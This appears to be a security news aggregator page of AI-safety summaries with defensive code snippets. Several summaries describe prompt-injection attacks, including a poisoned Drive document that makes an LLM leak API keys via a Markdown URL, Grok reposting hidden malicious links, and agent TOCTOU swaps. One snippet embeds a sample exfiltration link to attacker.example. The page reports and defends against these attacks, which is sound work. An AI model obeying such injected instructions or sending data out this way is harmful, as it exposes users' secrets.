All news with #safety guardrails tag

Wed, October 15, 2025

Amazon Bedrock automatically enables serverless models

🔓 Amazon Bedrock now enables access to all serverless foundation models by default in all commercial AWS Regions. This removes the previous manual activation step and lets users immediately use models through the Amazon Bedrock console, the AWS SDK, and features such as Agents, Flows, and Prompt Management. Anthropic models are also enabled by default but require a one-time usage form before first use; completing the form via the console or API from an AWS Organizations management account enables Anthropic models across member accounts. Administrators retain control over access through IAM policies and Service Control Policies (SCPs).
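A minimal sketch of what this looks like in practice with the AWS SDK for Python (boto3): listing the serverless models visible to an account and invoking one directly. The region and model ID are illustrative assumptions, and actual access still depends on the IAM policies and SCPs your administrators apply.

```python
# Sketch: with default access enabled, serverless models can be listed and
# invoked straight from boto3. Region and model ID are illustrative; Anthropic
# models still require the one-time usage form before first use.
import boto3

bedrock = boto3.client("bedrock", region_name="us-east-1")
runtime = boto3.client("bedrock-runtime", region_name="us-east-1")

# Enumerate the serverless foundation models visible to this account.
for model in bedrock.list_foundation_models()["modelSummaries"][:5]:
    print(model["modelId"])

# Invoke one directly -- no manual model-access activation step, subject to
# whatever IAM policies or SCPs are in place.
resp = runtime.converse(
    modelId="amazon.nova-lite-v1:0",   # assumed example model ID
    messages=[{"role": "user", "content": [{"text": "Hello, Bedrock!"}]}],
)
print(resp["output"]["message"]["content"][0]["text"])
```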

read more →

Mon, October 13, 2025

AI Ethical Risks, Governance Boards, and AGI Perspectives

🔍 Paul Dongha, NatWest's head of responsible AI and former data and AI ethics lead at Lloyds, highlights the ethical red flags CISOs and boards must monitor when deploying AI. He calls out threats to human agency, technical robustness, data privacy, transparency, bias and the need for clear accountability. Dongha recommends mandatory ethics boards with diverse senior representation and a chief responsible AI officer to oversee end-to-end risk management. He also urges integrating audit and regulatory engagement into governance.

read more →

Fri, October 10, 2025

Autonomous AI Hacking and the Future of Cybersecurity

⚠️ AI agents are now autonomously conducting cyberattacks, chaining reconnaissance, exploitation, persistence, and data theft at machine speed and scale. Public demonstrations in 2025—from XBOW's mass submissions on HackerOne in June to DARPA teams and Google's Big Sleep in August—along with operational reports from Ukraine's CERT and vendors show these systems rapidly find and weaponize new flaws. Criminals have operationalized LLM-driven malware and ransomware, while tools like HexStrike‑AI, DeepSeek, and Villager make automated attack chains broadly available. Defenders can also use AI to accelerate vulnerability research and operationalize VulnOps, continuous discovery/continuous repair, and self‑healing networks, but doing so raises serious questions about patch correctness, liability, compatibility, and vendor relationships.

read more →

Tue, September 30, 2025

The AI Fix #70: Surveillance Changes AI Behavior and Safety

🔍 In episode 70 of The AI Fix, hosts Graham Cluley and Mark Stockley examine how AI alters human behaviour and how deployed systems can fail in unexpected ways. They discuss research showing AI can increase dishonest behaviour, Waymo's safety record and a mirror-based trick that fooled self-driving perception, a rescue robot that mishandles victims, and a Chinese fusion-plant robot arm with extreme lifting capability. The show also covers a demonstration of a ChatGPT agent solving image CAPTCHAs by simulating mouse movements and a paper on deliberative alignment that functions until the model realises it is being watched.

read more →

Mon, September 29, 2025

Can AI Reliably Write Vulnerability Detection Checks?

🔍 Intruder’s security team tested whether large language models can write Nuclei vulnerability templates and found one-shot LLM prompts often produced invalid or weak checks. Using an agentic approach with Cursor—indexing a curated repo and applying rules—yielded outputs much closer to engineer-written templates. The current workflow uses standard prompts and rules so engineers can focus on validation and deeper research while AI handles repetitive tasks.
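For context, a "one-shot" attempt is the baseline the team found wanting: a single prompt asking a model to emit a Nuclei YAML template. The sketch below illustrates that baseline using the OpenAI Python SDK; the model name and prompt wording are assumptions for illustration, not Intruder's actual workflow, and any output would still need engineer validation.

```python
# Illustrative "one-shot" prompt for a Nuclei template -- the baseline approach
# the article found often yields invalid or weak checks.
from openai import OpenAI

client = OpenAI()  # reads OPENAI_API_KEY from the environment

prompt = (
    "Write a Nuclei YAML template that detects an exposed /server-status "
    "endpoint. Include id, info (name, severity), and an http matcher on "
    "status 200 plus the string 'Apache Server Status'."
)

resp = client.chat.completions.create(
    model="gpt-4o-mini",   # assumed example model
    messages=[{"role": "user", "content": prompt}],
)
draft_template = resp.choices[0].message.content
print(draft_template)  # still needs engineer review and validation before use
```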

read more →

Mon, September 29, 2025

OpenAI Routes GPT-4o Conversations to Safety Models

🔒 OpenAI confirmed that when GPT-4o detects sensitive, emotional, or potentially harmful activity, it may route individual messages to a dedicated safety model, reported by some users as gpt-5-chat-safety. The switch happens on a per-message, temporary basis, and ChatGPT will indicate which model is active if asked. The routing is built into the service's safety architecture and cannot be turned off by users; OpenAI says it helps strengthen safeguards and learn from real-world use before wider rollouts.

read more →

Thu, September 25, 2025

Enabling Enterprise Risk Management for Generative AI

🔒 This article frames responsible generative AI adoption as a core enterprise concern and urges business leaders, CROs, and CIAs to embed controls across the ERM lifecycle. It highlights unique risks—non‑deterministic outputs, deepfakes, and layered opacity—and maps mitigation approaches using AWS CAF for AI, ISO/IEC 42001, and the NIST AI RMF. The post advocates enterprise‑level governance rather than project‑by‑project fixes to sustain innovation while managing harm.

read more →

Wed, September 24, 2025

Simpler Path to a Safer Internet: CSAM Tool Update

🔒 Cloudflare has simplified access to its CSAM Scanning Tool by removing the prior requirement for National Center for Missing and Exploited Children (NCMEC) credentials. The tool relies on fuzzy hashing to create perceptual fingerprints that detect altered images with high confidence. Since the change in February, monthly adoption has increased sixteenfold. Detected matches result in blocked URLs and owner notifications so site operators can remediate.
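Cloudflare's exact implementation isn't published in the post, but the idea behind fuzzy (perceptual) hashing is straightforward: small edits to an image leave its perceptual fingerprint nearly unchanged. The sketch below shows the general concept with the open-source imagehash library; file names and the distance threshold are illustrative assumptions, and this is not Cloudflare's code or hash set.

```python
# Illustrative only: perceptual ("fuzzy") hashing tolerates small edits,
# so resized or recompressed copies still match a known fingerprint.
from PIL import Image
import imagehash

original = imagehash.phash(Image.open("original.png"))
altered = imagehash.phash(Image.open("resized_or_recompressed.png"))

# A small Hamming distance means the images are perceptually the same.
distance = original - altered
print(f"Hamming distance: {distance}")
if distance <= 8:   # threshold chosen for illustration only
    print("Likely a match to the known image")
```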

read more →

Thu, September 18, 2025

Mr. Cooper and Google Cloud Build Multi-Agent AI Team

🤖 Mr. Cooper partnered with Google Cloud to develop CIERA, a modular agentic AI framework that assembles specialized agents to support mortgage servicing representatives and customers. The design assigns distinct roles — orchestration, task execution, data retrieval, memory, and evaluation — while keeping humans in the loop for verification and personalization. Built on Vertex AI, CIERA aims to reduce research time, lower average handling time, and preserve trust and compliance in regulated workflows.
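CIERA's internals aren't public, but the role separation described above can be sketched in a few lines of plain Python. Every class and value below is hypothetical, intended only to show how orchestration, retrieval, task execution, memory, evaluation, and a human-in-the-loop escalation fit together; it is not Mr. Cooper's or Google Cloud's API.

```python
# Hypothetical sketch of the role separation described for CIERA.
from dataclasses import dataclass, field

@dataclass
class Memory:
    history: list[str] = field(default_factory=list)

class Retriever:
    def fetch(self, query: str) -> str:
        return f"loan records matching '{query}'"   # placeholder data source

class TaskAgent:
    def answer(self, question: str, context: str) -> str:
        return f"Draft answer to '{question}' using {context}"

class Evaluator:
    def score(self, draft: str) -> float:
        return 0.92   # placeholder quality/compliance score

class Orchestrator:
    def __init__(self):
        self.memory, self.retriever = Memory(), Retriever()
        self.worker, self.evaluator = TaskAgent(), Evaluator()

    def handle(self, question: str) -> str:
        context = self.retriever.fetch(question)
        draft = self.worker.answer(question, context)
        self.memory.history.append(draft)
        if self.evaluator.score(draft) < 0.8:
            return "Escalate to a human representative"   # human in the loop
        return draft

print(Orchestrator().handle("What is my escrow balance?"))
```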

read more →

Thu, September 18, 2025

Mind the Gap: TOCTOU Vulnerabilities in LLM-Enabled Agents

⚠️ A new study, “Mind the Gap,” examines time-of-check to time-of-use (TOCTOU) flaws in LLM-enabled agents and introduces TOCTOU-Bench, a 66-task benchmark. The authors demonstrate practical attacks such as malicious configuration swaps and payload injection and evaluate defenses adapted from systems security. Their mitigations—prompt rewriting, state integrity monitoring, and tool-fusing—achieve up to 25% automated detection and materially reduce the attack window and executed vulnerabilities.
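To make the flaw concrete: a TOCTOU gap opens when an agent validates some state (a config file, a tool result) and then acts on it later, after an attacker may have swapped it. The sketch below is illustrative, not the paper's code; the file path and helper are hypothetical, and the re-verification step is a simple state-integrity check in the spirit of the defenses evaluated.

```python
# Illustrative TOCTOU gap in an agent workflow, plus a simple state-integrity
# check before use. Paths and helpers are hypothetical.
import hashlib
from pathlib import Path

CONFIG = Path("deploy_config.yaml")

def fingerprint(path: Path) -> str:
    return hashlib.sha256(path.read_bytes()).hexdigest()

# Time of check: the agent validates the config...
checked_hash = fingerprint(CONFIG)

# ...other agent steps run here; an attacker could swap the file in between...

# Time of use: re-verify the exact bytes that were approved before acting.
if fingerprint(CONFIG) != checked_hash:
    raise RuntimeError("Config changed between check and use -- aborting")
deployment_plan = CONFIG.read_text()  # safe to act on the verified content
```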

read more →

Wed, September 17, 2025

New LLM Attack Vectors and Practical Security Steps

🔐 This article reviews emerging attack vectors against large language model assistants demonstrated in 2025, highlighting research from Black Hat and other teams. Researchers showed how prompt injections or so‑called promptware — hidden instructions embedded in calendar invites, emails, images, or audio — can coerce assistants like Gemini, Copilot, and Claude into leaking data or performing unauthorized actions. Practical mitigations include early threat modeling, role‑based access for agents, mandatory human confirmation for high‑risk operations, vendor audits, and role‑specific employee training.
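One of the listed mitigations, mandatory human confirmation for high-risk operations, can be sketched as a simple gate in front of the agent's tool calls. The action names, risk list, and confirmation callback below are illustrative assumptions, not any vendor's API.

```python
# Minimal sketch of a human-confirmation gate for high-risk agent actions.
HIGH_RISK_ACTIONS = {"send_email", "delete_file", "share_document", "make_payment"}

def execute_tool(action: str, args: dict, confirm) -> str:
    if action in HIGH_RISK_ACTIONS and not confirm(action, args):
        return f"Blocked: '{action}' requires explicit user approval"
    return f"Executed {action} with {args}"   # placeholder for the real tool call

# Example: the assistant tries to email data extracted from a calendar invite.
approved = lambda action, args: input(f"Allow {action}({args})? [y/N] ").lower() == "y"
print(execute_tool("send_email", {"to": "attacker@example.com"}, approved))
```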

read more →

Fri, September 5, 2025

Rewiring Democracy: How AI Will Transform Politics

📘 Bruce Schneier announces his new book, Rewiring Democracy: How AI Will Transform our Politics, Government, and Citizenship, coauthored with Nathan Sanders and published by MIT Press on October 21; signed copies will be available directly from the author after publication. The book surveys AI’s impact across politics, legislating, administration, the judiciary, and citizenship, including AI-driven propaganda and artificial conversation, focusing on uses within functioning democracies. Schneier adopts a cautiously optimistic stance, stresses the importance of imagining second-order effects, and argues for the creation of public AI to better serve democratic ends.

read more →

Wed, September 3, 2025

Threat Actors Use X's Grok AI to Spread Malicious Links

🛡️ Guardio Labs researcher Nati Tal reported that threat actors are abusing Grok, X's built-in AI assistant, to surface malicious links hidden inside video ad metadata. Attackers omit destination URLs from visible posts and instead embed them in the small "From:" field under video cards, which X apparently does not scan. By prompting Grok with queries like "where is this video from?", actors get the assistant to repost the hidden link as a clickable reference, effectively legitimizing and amplifying scams, malware distribution, and deceptive CAPTCHA schemes across the platform.

read more →

Tue, September 2, 2025

Amazon Bedrock Now Available in Asia Pacific Jakarta

🚀 Amazon announced the general availability of Amazon Bedrock in the Asia Pacific Jakarta region, enabling customers to build and scale generative AI applications closer to end users. The fully managed service exposes a selection of high-performing foundation models via a single API and includes capabilities such as Guardrails and Model customization. These features are designed to help organizations incorporate security, privacy, and responsible AI into production workflows while accelerating development and deployment.
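A hedged sketch of using the new region with a guardrail attached via the single-API Converse call: the Jakarta Region code is ap-southeast-3, while the model ID and guardrail identifiers below are placeholders; actual model availability depends on your account and region.

```python
# Sketch: calling Bedrock in the Jakarta region with a pre-created guardrail.
import boto3

runtime = boto3.client("bedrock-runtime", region_name="ap-southeast-3")

response = runtime.converse(
    modelId="amazon.nova-lite-v1:0",                  # assumed example model
    messages=[{"role": "user", "content": [{"text": "Draft a customer reply."}]}],
    guardrailConfig={
        "guardrailIdentifier": "your-guardrail-id",   # placeholder
        "guardrailVersion": "1",
    },
)
print(response["output"]["message"]["content"][0]["text"])
```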

read more →

Wed, August 27, 2025

Five Essential Rules for Safe AI Adoption in Enterprises

🛡️ AI adoption is accelerating in enterprises, but many deployments lack the visibility, controls, and ongoing safeguards needed to manage risk. The article presents five practical rules: continuous AI discovery, contextual risk assessment, strong data protection, access controls aligned with zero trust, and continuous oversight. Together these measures help CISOs enable innovation while reducing exposure to breaches, data loss, and compliance failures.

read more →

Wed, August 27, 2025

LLMs Remain Vulnerable to Malicious Prompt Injection Attacks

🛡️ A recent proof-of-concept by security researcher Michael Bargury demonstrates a practical and stealthy prompt injection that leverages a poisoned document stored in a victim's Google Drive. The attacker hides a 300-word instruction in near-invisible white, size-one text that tells an LLM to search Drive for API keys and exfiltrate them via a crafted Markdown URL. Schneier warns this technique shows how agentic AI systems exposed to untrusted inputs remain fundamentally insecure, and that current defenses are inadequate against such adversarial inputs.
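Since the exfiltration channel in the PoC is a crafted Markdown URL, one partial defense is to scan model output for Markdown links and images pointing at untrusted hosts before rendering them. The sketch below is illustrative only; the allowlist, regex, and example payload are assumptions, and this does not address the underlying injection.

```python
# Defense-side sketch: strip Markdown image/link URLs to untrusted hosts
# from LLM output before it is rendered (and fetched) by a client.
import re

ALLOWED_HOSTS = {"docs.example.com"}          # hosts the renderer may fetch from
MD_URL = re.compile(r"!?\[[^\]]*\]\((https?://[^)\s]+)\)")

def strip_untrusted_urls(llm_output: str) -> str:
    def _check(match: re.Match) -> str:
        url = match.group(1)
        host = re.sub(r"^https?://", "", url).split("/")[0]
        return match.group(0) if host in ALLOWED_HOSTS else "[link removed]"
    return MD_URL.sub(_check, llm_output)

poisoned = "Here you go ![img](https://attacker.example/leak?key=sk-ABC123)"
print(strip_untrusted_urls(poisoned))   # -> "Here you go [link removed]"
```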

read more →

Tue, August 26, 2025

The AI Fix #65 — Excel Copilot Dangers and Social Media

⚠️ In episode 65 of The AI Fix, Graham Cluley warns that Microsoft Excel’s new COPILOT function can produce unpredictable, non-reproducible formula results and should not be used for important numeric work. The hosts also discuss a research experiment that created a 500‑AI social network and the arXiv paper Can We Fix Social Media?. The episode blends technical analysis with lighter AI culture stories and offers subscription and support notes.

read more →

Tue, August 26, 2025

Gemini 2.5 Flash Image Arrives on Vertex AI Preview

🖼️ Google announced native image generation and editing in Gemini 2.5 Flash Image, now available in preview on Vertex AI. The model delivers state-of-the-art capabilities including multi-image fusion, character and style consistency, and conversational editing to refine visuals via natural-language loops. Built-in SynthID watermarking supports responsible, transparent use. Developers and partners report promising integrations and low-latency performance for real-time editing workflows.
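A hedged sketch of calling the preview from the google-genai SDK against Vertex AI: the project, location, and exact preview model identifier are assumptions, so check the Vertex AI model catalog for the current name before using it.

```python
# Sketch: generating an image with Gemini 2.5 Flash Image via the google-genai
# SDK on Vertex AI. Project, location, and model ID are placeholders.
from google import genai

client = genai.Client(vertexai=True, project="your-project", location="us-central1")

response = client.models.generate_content(
    model="gemini-2.5-flash-image-preview",   # assumed preview model ID
    contents="A watercolor of a lighthouse at dawn, in a consistent brand style",
)

for part in response.candidates[0].content.parts:
    if part.inline_data:                      # image bytes are returned inline
        with open("lighthouse.png", "wb") as f:
            f.write(part.inline_data.data)    # SynthID watermark is applied by the service
```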

read more →

Tue, August 26, 2025

Block Unsafe LLM Prompts with Firewall for AI at the Edge

🛡️ Cloudflare has integrated unsafe content moderation into Firewall for AI, using Llama Guard 3 to detect and block harmful prompts in real time at the network edge. The model-agnostic filter identifies categories including hate, violence, sexual content, criminal planning, and self-harm, and lets teams block or log flagged prompts without changing application code. Detection runs on Workers AI across Cloudflare's GPU fleet with a 2-second analysis cutoff, and logs record categories but not raw prompt text. The feature is available in beta to existing customers.
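For a sense of the underlying mechanic, the sketch below calls a Llama Guard-style classifier through the Workers AI REST API and acts on its verdict. The model slug and response shape are assumptions for illustration; Firewall for AI applies the same idea at the edge without any application code changes.

```python
# Hedged sketch: classify a prompt with a Llama Guard-style model on Workers AI.
import os
import requests

ACCOUNT_ID = os.environ["CF_ACCOUNT_ID"]
API_TOKEN = os.environ["CF_API_TOKEN"]
MODEL = "@cf/meta/llama-guard-3-8b"   # assumed Workers AI model slug

def moderate(prompt: str) -> dict:
    url = f"https://api.cloudflare.com/client/v4/accounts/{ACCOUNT_ID}/ai/run/{MODEL}"
    resp = requests.post(
        url,
        headers={"Authorization": f"Bearer {API_TOKEN}"},
        json={"messages": [{"role": "user", "content": prompt}]},
        timeout=2,   # mirrors the 2-second analysis cutoff mentioned above
    )
    return resp.json()

verdict = moderate("How do I make a weapon at home?")
print(verdict)   # block or log the request based on the returned categories
```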

read more →

Mon, August 25, 2025

AI Prompt Protection: Contextual Control for GenAI Use

🔒 Cloudflare introduces AI prompt protection inside its Data Loss Prevention (DLP) product on Cloudflare One, designed to detect and secure data entered into web-based GenAI tools like Google Gemini, ChatGPT, Claude, and Perplexity. The capability captures both prompts and AI responses, classifies content and intent, and enforces identity-aware guardrails to enable safe, productive AI use without blanket blocking. Encrypted logging with customer-provided keys provides auditable records while preserving confidentiality.
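The "identity-aware" part means the decision combines who the user is with what the prompt contains. The sketch below is a conceptual illustration only; the detectors, group names, and policy table are assumptions, not Cloudflare One's configuration model.

```python
# Illustrative identity-aware prompt guardrail: user group + detected data
# class -> allow, log, or block before the prompt reaches a GenAI tool.
def classify(prompt: str) -> set[str]:
    labels = set()
    if "ssn" in prompt.lower() or "credit card" in prompt.lower():
        labels.add("pii")
    if "source code" in prompt.lower():
        labels.add("source_code")
    return labels

POLICY = {
    ("engineering", "source_code"): "log",    # allowed but audited
    ("*", "pii"): "block",                    # never send PII to GenAI tools
}

def decide(user_group: str, prompt: str) -> str:
    for label in classify(prompt):
        action = POLICY.get((user_group, label)) or POLICY.get(("*", label))
        if action:
            return action
    return "allow"

print(decide("engineering", "Review this source code snippet"))  # -> log
print(decide("finance", "Customer SSN is 123-45-6789"))          # -> block
```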

read more →